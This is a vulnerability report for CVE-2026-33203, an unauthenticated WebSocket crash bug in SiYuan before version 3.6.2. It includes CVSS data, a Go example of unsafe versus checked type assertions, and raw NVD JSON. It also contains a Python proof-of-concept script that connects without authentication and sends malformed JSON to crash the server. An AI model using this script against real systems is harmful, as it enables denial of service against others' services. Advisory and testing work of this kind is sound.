Security Vulnerability Report
CVE-2026-33203 CVSS 7.5 HIGH

CVE-2026-33203

Published: 2026-03-20 23:16:46
Last Modified: 2026-03-23 18:48:43

Description

SiYuan is a personal knowledge management system. Prior to version 3.6.2, the SiYuan kernel WebSocket server accepts unauthenticated connections when a specific "auth keepalive" query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON. A remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service. Version 3.6.2 fixes the issue.
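The panic class described above comes from Go's single-value type assertion applied to decoded JSON. The following is an added example, not SiYuan's code: it puts that pattern beside the comma-ok form that returns an error instead, and the message shape and the `cmd` field name are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Constructed sample messages; the "cmd" field name is an assumption for illustration.
const (
	wellFormed = `{"cmd":"ping","param":{}}`
	wrongType  = `{"cmd":12345,"param":{}}`
)

// unsafeCmd shows the vulnerable pattern: a single-value type assertion
// on decoded JSON panics when the value is not a string.
func unsafeCmd(raw string) string {
	var msg map[string]interface{}
	_ = json.Unmarshal([]byte(raw), &msg)
	return msg["cmd"].(string) // panics on a number, null, or missing key
}

// safeCmd uses the comma-ok form and returns an error instead of panicking.
func safeCmd(raw string) (string, error) {
	var msg map[string]interface{}
	if err := json.Unmarshal([]byte(raw), &msg); err != nil {
		return "", fmt.Errorf("invalid JSON: %w", err)
	}
	cmd, ok := msg["cmd"].(string)
	if !ok {
		return "", errors.New(`"cmd" missing or not a string`)
	}
	return cmd, nil
}

// panics reports whether f panics. A per-message recover like this also keeps
// one bad frame from terminating the whole process.
func panics(f func()) (p bool) {
	defer func() { p = recover() != nil }()
	f()
	return false
}

func main() {
	fmt.Println("unsafe panics on wrong type:", panics(func() { unsafeCmd(wrongType) }))
	_, err := safeCmd(wrongType)
	fmt.Println("safe returns error:", err)
}
```

An unrecovered panic in any goroutine ends the Go process, which is why a single malformed message maps to the availability impact in the CVSS vector.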

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:* - VULNERABLE
SiYuan < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio
import websockets
import json


async def exploit():
    # Target URL with the vulnerable query parameter
    # Note: Default SiYuan WebSocket port is usually 6806
    target_url = "ws://<TARGET_IP>:6806/?auth=keepalive"

    try:
        # Establish connection without authentication
        async with websockets.connect(target_url) as websocket:
            print("[+] Connection established (Unauthenticated)")

            # Construct malformed JSON payload
            # This payload is designed to trigger a type assertion panic
            # by sending a type that the server does not expect.
            malicious_payload = {
                "cmd": "blockPush",
                "data": {
                    "datatype": 12345,  # Sending int instead of expected string/object
                    "data": "malicious_content"
                }
            }

            print("[*] Sending malformed payload...")
            await websocket.send(json.dumps(malicious_payload))
            print("[+] Payload sent. Check if the server crashed.")

            # Try to receive a response (likely to fail or hang if crashed)
            response = await websocket.recv()
            print(f"[-] Server response: {response}")

    except Exception as e:
        print(f"[!] Error occurred: {e}")


if __name__ == "__main__":
    asyncio.run(exploit())

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33203", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:45.520", "lastModified": "2026-03-23T18:48:43.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the SiYuan kernel WebSocket server accepts unauthenticated connections when a specific \"auth keepalive\" query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON. A remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service. Version 3.6.2 fixes the issue."}, {"lang": "es", "value": "SiYuan es un sistema de gestión de conocimiento personal. Antes de la versión 3.6.2, el servidor WebSocket del kernel de SiYuan acepta conexiones no autenticadas cuando un parámetro de consulta específico 'auth keepalive' está presente. Después de la conexión, los mensajes entrantes se analizan utilizando aserciones de tipo no verificadas en JSON controlado por el atacante. Un atacante remoto puede enviar mensajes malformados que desencadenan un pánico en tiempo de ejecución, lo que podría bloquear el proceso del kernel y causar una denegación de servicio. La versión 3.6.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-248"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-3g9h-9hp4-654v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}